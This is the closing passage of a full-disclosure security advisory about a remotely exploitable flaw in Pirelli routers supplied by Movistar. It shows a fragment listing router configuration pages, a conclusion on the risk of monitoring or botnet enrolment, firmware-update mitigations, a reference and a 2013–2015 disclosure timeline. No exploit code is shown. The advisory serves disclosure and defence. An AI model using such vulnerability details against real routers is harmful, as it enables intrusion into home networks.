diagpppoa.html ippcfg.html pwrmngt.html statsatm.html
+ Conclusion:
This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network
or even worse being a member of a botnet without knowledge of it.
First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them.
+ References:
http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html
+ Timeline:
2013-04-xx Send email to Movistar and Pirelli
2015-01-05 Full disclosure